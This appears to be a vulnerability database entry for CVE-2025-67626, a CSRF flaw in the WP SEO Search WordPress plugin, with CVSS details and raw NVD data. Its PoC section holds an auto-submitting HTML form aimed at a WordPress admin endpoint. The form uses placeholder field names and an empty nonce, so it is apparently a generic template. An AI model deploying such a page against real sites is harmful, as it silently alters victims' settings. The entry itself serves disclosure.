Security Vulnerability Report
中文
CVE-2025-67626 CVSS 4.3 MEDIUM

CVE-2025-67626

Published: 2026-01-22 17:16:02
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Angel Costa WP SEO Search wp-seo-search allows Cross Site Request Forgery.This issue affects WP SEO Search: from n/a through <= 1.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP SEO Search插件 <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67626 - WP SEO Search Plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-67626</title> </head> <body> <h2>CSRF PoC for WP SEO Search Plugin</h2> <p>This PoC demonstrates the CSRF vulnerability in WP SEO Search plugin <= 1.1</p> <form action="http://target-site/wp-admin/admin.php" method="POST" id="csrf-form"> <!-- Modify these hidden fields based on target plugin functionality --> <input type="hidden" name="page" value="wp-seo-search-settings"> <input type="hidden" name="action" value="save"> <input type="hidden" name="seo_option" value="malicious_value"> <input type="hidden" name="settings_nonce" value=""> </form> <script> // Auto-submit form when page loads document.getElementById('csrf-form').submit(); </script> <p>If you see this message, the form has been submitted.</p> <p>Target: Replace 'target-site' with the actual WordPress site URL</p> </body> </html> <!-- Alternative: Image tag based CSRF (for GET requests) --> <!-- <img src="http://target-site/wp-admin/admin.php?page=wp-seo-search&action=malicious" width="0" height="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67626", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:02.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Angel Costa WP SEO Search wp-seo-search allows Cross Site Request Forgery.This issue affects WP SEO Search: from n/a through <= 1.1."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Angel Costa WP SEO Search wp-seo-search permite la falsificación de petición en sitios cruzados. Este problema afecta a WP SEO Search: desde n/a hasta &lt;= 1.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-seo-search/vulnerability/wordpress-wp-seo-search-plugin-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}